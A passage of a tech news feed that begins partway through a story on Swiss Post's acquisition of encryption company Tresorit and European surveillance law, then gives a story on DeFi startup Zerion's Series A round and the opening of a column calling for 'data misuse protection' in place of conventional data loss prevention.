“Going public via an IPO has also been on our roadmap and could have been a realistic scenario within the next 3-4 years. The reason we have decided to partner now with a strategic investor and collaborate with Swiss Post is that their core values and vision on data privacy is a 100% fit with our values and mission of protecting privacy. With the acquisition, we entered a long-term strategic partnership and are convinced that with Tresorit’s end-to-end encryption technology and the trusted brand of Swiss Post we will further develop services that help individuals and businesses exchange information securely and privately.”

“Tresorit has paved the way for true end-to-end encryption across the software industry over the past decade. With the acquisition of Tresorit, we are strategically expanding our competencies in digital data security and digital privacy, allowing us to further develop existing offers,” added Nicole Burth, a member of the Swiss Post Group executive board and head of communication services, in a supporting statement.

Switzerland remains a bit of a hub for pro-privacy startups and services, owing to a historical reputation for strong privacy laws.

However, as Republik reported earlier this year, state surveillance activity in the country has been stepping up — following a 2018 amendment to legislative powers that expanded intercept capabilities to cover digital comms.

Such encroachments are worrying but may arguably make e2e encryption even more important — as it can offer a technical barrier against state-sanctioned privacy intrusions.

At the same time, there is a risk that legislators perceive rising use of robust encryption as a threat to national security interests and their associated surveillance powers — meaning they could seek to counter the trend by passing even more expansive legislation that directly targets or even outlaws the use of e2e encryption. (Australia has passed an anti-encryption law, for instance, while the UK cemented its mass surveillance capabilities back in 2016 — passing legislation which includes powers to compel companies to limit the use of encryption.)

At the European Union level, lawmakers have also recently been pushing an agenda of ‘lawful access’ to encrypted data — while simultaneously claiming to support the use of encryption on data security and privacy grounds. Quite how the EU will square that circle in legislative terms remains to be seen.

But there are also some legal tailwinds for European encryption startups like Tresorit: a ruling last summer by Europe’s top court dialled up the complexity of taking users’ personal data out of the region — certainly when people’s information is flowing to third countries like the US where it’s at risk from state agencies’ mass surveillance.

Asked if Tresorit has seen a rise in interest in the wake of the ‘Schrems II’ ruling, Lam told us: “We see the demand for European-based SaaS cloud services growing in the future. Being a European-based company has already been an important competitive advantage for us, especially among our business and enterprise customers.”

EU law in this area contains a quirk whereby the national security powers of Member States are not so clearly factored in vs third countries. And while Switzerland is not an EU Member it remains a closely associated country, being part of the bloc’s single market.

Nevertheless, questions over the sustainability of Switzerland’s EU data adequacy decision persist, given concerns that its growing domestic surveillance regime does not provide individuals with adequate redress remedies — and may therefore be violating their fundamental rights.

If Switzerland loses EU data adequacy it could impact the compliance requirements of digital services based in the country — albeit, again, e2e encryption could offer Swiss companies a technical solution to circumvent such legal uncertainty. So that still looks like good news for companies like Tresorit.

 

#3ts-capital-partners, #austria, #cloud, #cloud-services, #cloud-storage, #cryptography, #e2e-encryption, #encryption, #end-to-end-encryption, #europe, #european-union, #fundings-exits, #germany, #privacy, #schrems-ii, #security, #swiss-post, #switzerland, #tc, #tresorit

DeFi investor platform Zerion raises $8.2 million Series A

While crypto exchanges have demystified some of the largest cryptocurrencies for retail investors, many of the intricacies of decentralized finance are still lost on even more savvy investors as a result of DeFi’s weave of diverse offerings.

Zerion, a startup building a decentralized finance “interface” for crypto investors, has attracted venture capitalist attention on the back of recent growth. Amid a renewed crypto gold rush, the company has processed more than $600 million in transaction volume so far this year, and now has over 200,000 monthly active users, CEO Evgeny Yurtaev tells TechCrunch.

The startup has also wrapped an $8.2 million Series A funding round led by Mosaic Ventures, with participation from Placeholder, DCG, Lightspeed, Blockchain.com Ventures, among others. Mosaic’s Toby Coppel and Placeholder’s Brad Burnham have joined Zerion’s Board, the startup also shared.

Zerion gives customers access to more than 50,000 digital assets and 60 protocols on the Ethereum blockchain through their app which streamlines the UI of DeFi. Users can access tokens and invest through the app similar to exchanges like Coinbase or Gemini, but do so using their own personal wallets like MetaMask, meaning user funds and private keys aren’t controlled by or accessible to Zerion, a sticking point for Yurtaev, a life-long crypto enthusiast and builder.


“There are a bunch of different tokens and protocols in the DeFi space,” Yurtaev says. “In theory, it’s supposed to be easy to navigate, but in reality, it’s all a mess… We try to demystify them.”

Alongside major growth in Ethereum and Bitcoin prices, DeFi volume has surged in 2021, up from just under $20 billion at the year’s start to nearly $90 billion this May. The DeFi market at large has proven just as volatile as Bitcoin, with market volume falling some 35 percent in the past couple of months to just over $57 billion.

The startup’s mobile app on iOS and Android has become a particularly popular way for crypto investors to track the market and the tokens they’re backing. The average user opens the app more than 9 times per day, the company says.

Crypto’s 2021 upswing has drawn plenty of investor attention, not only to the assets themselves but to the platforms facilitating those transactions. Last month, venture capital firm Andreessen Horowitz announced that they had raised more than $2.2 billion to invest in startups building products in crypto spaces including decentralized finance.

 

#andreessen-horowitz, #android, #bitcoin, #blockchain, #blockchain-com, #brad-burnham, #ceo, #coinbase, #cryptocurrencies, #cryptocurrency, #cryptography, #decentralized-finance, #ethereum, #finance, #mosaic-ventures, #retail-investors, #tc, #toby-coppel, #uniswap, #venture-capital

To guard against data loss and misuse, the cybersecurity conversation must evolve

Data breaches have become a part of life. They impact hospitals, universities, government agencies, charitable organizations and commercial enterprises. In healthcare alone, 2020 saw 640 breaches, exposing 30 million personal records, a 25% increase over 2019 that equates to roughly two breaches per day, according to the U.S. Department of Health and Human Services. On a global basis, 2.3 billion records were breached in February 2021.

It’s painfully clear that existing data loss prevention (DLP) tools are struggling to deal with the data sprawl, ubiquitous cloud services, device diversity and human behaviors that constitute our virtual world.

Conventional DLP solutions are built on a castle-and-moat framework in which data centers and cloud platforms are the castles holding sensitive data. They’re surrounded by networks, endpoint devices and human beings that serve as moats, defining the defensive security perimeters of every organization. Conventional solutions assign sensitivity ratings to individual data assets and monitor these perimeters to detect the unauthorized movement of sensitive data.

Unfortunately, these historical security boundaries are becoming increasingly ambiguous and somewhat irrelevant as bots, APIs and collaboration tools become the primary conduits for sharing and exchanging data.

In reality, data loss is only half the problem confronting a modern enterprise. Corporations are routinely exposed to financial, legal and ethical risks associated with the mishandling or misuse of sensitive information within the corporation itself. The risks associated with the misuse of personally identifiable information have been widely publicized.

However, risks of similar or greater severity can result from the mishandling of intellectual property, material nonpublic information, or any type of data that was obtained through a formal agreement that placed explicit restrictions on its use.

Conventional DLP frameworks are incapable of addressing these challenges. We believe they need to be replaced by a new data misuse protection (DMP) framework that safeguards data from unauthorized or inappropriate use within a corporate environment in addition to its outright theft or inadvertent loss. DMP solutions will provide data assets with more sophisticated self-defense mechanisms instead of relying on the surveillance of traditional security perimeters.

#bridgecrew, #cloud-computing, #collaboration-tools, #column, #computer-security, #cryptography, #data-management, #dlp, #ec-column, #ec-cybersecurity, #ec-enterprise-applications, #enterprise, #security, #security-tools, #stacklet, #startups